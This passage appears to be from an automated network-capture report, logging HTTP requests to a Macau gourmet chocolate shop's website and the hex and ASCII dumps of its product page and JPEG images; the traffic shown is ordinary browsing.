00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a
                                                                                                                                                              Data Ascii: 0ExifMM*4(12i ''Adobe Photoshop CS6 (Windows)2020:06:23 10:40:4302214nv(~.HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:
                                                                                                                                                              Mar 13, 2023 05:27:03.583277941 CET3271OUTGET /OurChocology.asp HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:03.832853079 CET3272INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:09 GMT
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Content-Length: 15690
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Expires: Mon, 13 Mar 2023 04:27:09 GMT
                                                                                                                                                              Cache-control: private
                                                                                                                                                              Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 47 6f 75 72 6d 65 74 20 48 6f 75 73 65 20 4d 61 63 61 75 20 4c 74 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6d 61 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 66 65 6e 79 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 3c 21 2d 2d 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 73 77 61 70 49 6d 67 52 65 73 74 6f 72 65 28 29 20 7b 20 2f 2f 76 33 2e 30 0d 0a 20 20 76 61 72 20 69 2c 78 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 4d 4d 5f 73 72 3b 20 66 6f 72 28 69 3d 30 3b 61 26 26 69 3c 61 2e 6c 65 6e 67 74 68 26 26 28 78 3d 61 5b 69 5d 29 26 26 78 2e 6f 53 72 63 3b 69 2b 2b 29 20 78 2e 73 72 63 3d 78 2e 6f 53 72 63 3b 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 70 72 65 6c 6f 61 64 49 6d 61 67 65 73 28 29 20 7b 20 2f 2f 76 33 2e 30 0d 0a 20 20 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 3b 20 69 66 28 64 2e 69 6d 61 67 65 73 29 7b 20 69 66 28 21 64 2e 4d 4d 5f 70 29 20 64 2e 4d 4d 5f 70 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 0d 0a 20 20 20 20 76 61 72 20 69 2c 6a 3d 64 2e 4d 4d 5f 70 2e 6c 65 6e 67 74 68 2c 61 3d 4d 4d 5f 70 72 65 6c 6f 61 64 49 6d 61 67 65 73 2e 61 72 67 75 6d 65 6e 74 73 3b 20 66 6f 72 28 69 3d 30 3b 20 69 3c 61 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0d 0a 20 20 20 20 69 66 20 28 61 5b 69 5d 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 21 3d 30 29 7b 20 64 2e 4d 4d 5f 70 5b 6a 5d 3d 6e 65 77 20 49 6d 61 67 65 3b 20 64 2e 4d 4d 5f 70 5b 6a 2b 2b 5d 2e 73 72 63 3d 61 5b 69 5d 3b 7d 7d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 66 69 6e 64 4f 62 6a 28 6e 2c 20 64 29 20 7b 20 2f 2f 76 34 2e 30 31 0d 0a 20 20 76 61 72 20 70 2c 69 2c 78 3b 20 20 69 66 28 21 64 29 20 64 3d 64 6f 63 75 6d 65 6e 74 3b 20 69 66 28 28 70 3d 6e 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 29 3e 30 26 26 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 2e 6c 65 6e 67 74 68 29 20 7b 0d 0a 20 20 20 20 64 3d 70 61 72 65 6e 74 2e 66 72 61 6d 65 73 5b 6e 2e 73 75 62 73 74 72 69 6e 67 28 70 2b 31 29 5d 2e 64 6f 63 75 6d 65 6e 74 3b 20 6e 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 70 29 3b 7d 0d 0a 20 20 69 66 28 21 28 78 3d 64 5b 6e 5d 29 26 26 64 2e 61 6c 6c 29 20 78 3d 64 2e 61 6c 6c 5b
                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Gourmet House Macau Ltd</title><link href="main.css" rel="stylesheet" type="text/css" /><link href="fenye.css" rel="stylesheet" type="text/css" /><script type="text/JavaScript">...function MM_swapImgRestore() { //v3.0 var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}}function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);} if(!(x=d[n])&&d.all) x=d.all[
                                                                                                                                                              Mar 13, 2023 05:27:22.212996960 CET3449OUTGET /uploadfiles/SRL_1_1_3750019.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.436961889 CET3463INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 256111
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "3636843aa8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 38 33 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 30 38 3a 35 39 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 95 34 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 83ExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:08:59"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(4HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H
                                                                                                                                                              Mar 13, 2023 05:27:28.782737017 CET4313OUTGET /images/productMain_top.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:29.002846956 CET4383INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 812
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "567c65f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:34 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1b 00 c8 03 01 11 00 02 11 01 03 11 01 ff c4 00 6c 00 01 01 01 00 03 00 00 00 00 00 00 00 00 00 00 00 04 03 06 00 01 09 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 03 01 00 02 04 06 07 10 00 03 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 01 02 31 41 11 03 04 21 06 51 23 11 01 01 01 00 02 01 04 03 00 00 00 00 00 00 00 00 00 02 01 11 03 51 21 31 41 05 12 42 04 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f6 67 f4 9f a7 f5 fb 7d 7d fe 3f 27 75 74 78 3a 6d c7 f9 be 1f 6b 9f 8e a9 af bc 7f 11 f9 97 de fd f7 6f f4 76 d7 57 5d 7e 3d 79 bc 7a 7e dc 7c ee f8 f1 8f 0f 6f 76 ee f1 9e cc 9c b6 df 2d f2 de 59 f3 79 bc 80 88 16 54 a8 d0 d2 a5 c0 d2 a5 c6 87 95 c2 fa c7 97 46 40 f2 a6 46 86 95 2a 07 95 26 74 2c a9 08 5c 55 4e d9 3a c9 c6 b0 f5 96 1e a0 d7 86 0d 30 b6 0d 39 0e c1 a4 13 b3 60 52 07 67 9e 93 44 b0 69 04 bd 81 4e 45 b0 69 07 a6 d3 e5 3e 1a c3 0f 77 86 6b 3f 37 fa 7f 5f 8b d7 d1 e3 f5 f7 57 7f 83 be 94 7f a3 e5 f5 3a 7c 2a 96 fe f1 fd 47 d1 fd 17 df 76 ff 00 3f 6c f5 76 57 e5 d7 bb c7 af eb cf ce 6f 8f 38 6e ae ed cd e3 7d 98 b4 db 7c bf ad e5 9f 2f cf 20 5a 44 c6 26 05 95 2a 34 34 a9 70 34 a9 71 a1 e5 70 be b1 e5 d1 90 3c a9 91 a1 a5 4a 81 e5 49 9d 0b 2a 42 17 15 53 b6 4e b2 71 ac 3d 65 87 a8 35 e1 83 4c 2d 83 4e 43 b0 69 04 ec d8 14 81 d9 e7 a4 d1 2c 1a 41 2f 60 53 91 6c 1a 41 ac 2d 44 5f c6 9a ca 38 67 53 94 4c 65 a4 4c 62 60 59 52 a3 43 4a 97 03 4a 97 1a 1e 57 0b eb 1e 5d 19 03 ca 99 1a 1a 54 a8 1e 54 99 d0 b2 a4 21 71 55 3b 64 eb 27 1a c3 d6 58 7a 83 5e 18 34 c2 d8 34 e4 3b 06 90 4e cd 81 48 1d 9e 7a 4d 12 c1 a4 12 f6 05 39 16 c1 a4 1a c2 d4 42 b2 1e b3 93 94 6c 65 a4 4c 62 60 59 52 a3 43 4a 97 03 4a 97 1a 1e 57 0b eb 1e 5d 19 03 ca 99 1a 1a 54 a8 1e 54 99 d0 b2 a4 21 71 55 3b 64 eb 27 1a c3 d6 58 7a 83 5e 18 34 c2 d8 34 e4 3b 06 90 4e cd 81 48 1d 9e 7a 4d 12 c1 a4 12 f6 05 39 16 c1 a4 1a c2 d4 42 b2 1e b3 ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedl1A!Q#Q!1AB?g}}?'utx:mkovW]~=yz~|ov-YyTF@F*&t,\UN:09`RgDiNEi>wk?7_W:|*Gv?lvWo8n}|/ ZD&*44p4qp<JI*BSNq=e5L-NCi,A/`SlA-D_8gSLeLb`YRCJJW]TT!qU;d'Xz^44;NHzM9BleLb`YRCJJW]TT!qU;d'Xz^44;NHzM9B
                                                                                                                                                              Mar 13, 2023 05:27:30.689882994 CET4559OUTGET /SysImages/first.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:30.894153118 CET4562INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 575
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:36 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e41de41ca8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:36 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0e 03 01 11 00 02 11 01 03 11 01 ff c4 00 79 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 08 09 01 00 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 10 00 00 03 07 03 03 05 00 00 00 00 00 00 00 00 00 02 03 04 01 11 12 13 05 15 06 21 14 07 00 51 32 22 42 23 33 08 11 00 01 02 04 04 05 05 00 00 00 00 00 00 00 00 00 01 11 02 00 21 12 03 31 41 71 04 51 81 c1 52 13 f1 32 62 14 05 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 d3 ac 8f 30 5d 8c e5 9c 37 89 53 f8 b1 b9 05 2b 38 45 50 3a af 94 84 94 8d 08 cf a7 d1 95 2e 26 98 98 46 9a 50 42 ad 41 84 30 4c 12 91 16 5c 0c 14 2d 1b 66 0c 8c 9e f7 7d 7a de e0 31 b5 21 2e 9a f0 04 80 27 8c b3 41 d1 57 2e 96 bd ad 0d 50 56 7c b0 d7 5f 44 05 fc b7 5e 07 e7 ea 27 30 83 8a d1 03 31 37 29 1d 34 de 34 62 53 58 78 82 ca fa 8a 35 b4 4c 97 39 aa a5 05 81 7c bf bd 91 49 77 c5 d2 2d fe 9d f3 b5 75 d9 d5 da a7 bc 35 35 49 6b 96 50 af b0 ef 0f 92 99 ae 1c d1 35 eb 94 52 b4 8b ad a6 97 2e f5 2f 68 44 b9 56 b9 6e 96 17 41 33 d6 ee d1 6b df 5e ad af 51 5b 96 9c 4f 7c 4c 81 6d d7 73 48 8a f5 16 ec 52 e3 b5 bd fb 63 bc 21 d1 ee 7f 96 8e 7f b9 dd 0c a1 1d ed c3 e7 c4 41 1f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedy!Q2"B#3!1AqQR2b?0]7S+8EP:.&FPBA0L\-f}z1!.'AW.PV|_D^'017)44bSXx5L9|Iw-u55IkP5R./hDVnA3k^Q[O|LmsHRc!A
                                                                                                                                                              Mar 13, 2023 05:27:30.987226963 CET4614OUTGET /SysImages/Last.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:31.191572905 CET4678INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 570
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:36 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "ca62e1da8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:37 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0e 03 01 11 00 02 11 01 03 11 01 ff c4 00 77 00 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 08 09 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 10 00 00 04 05 04 02 03 01 00 00 00 00 00 00 00 00 01 02 03 04 11 12 13 05 06 21 14 15 07 00 51 22 32 42 08 11 00 01 02 04 05 02 07 00 00 00 00 00 00 00 00 00 01 11 02 00 21 12 03 f0 31 51 71 04 41 13 81 d1 32 52 62 14 05 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 d4 5b ce 50 e3 1e cd fa 43 0e b7 f5 da 39 5d b7 b0 ed 77 45 72 4b 8b 66 e9 6e 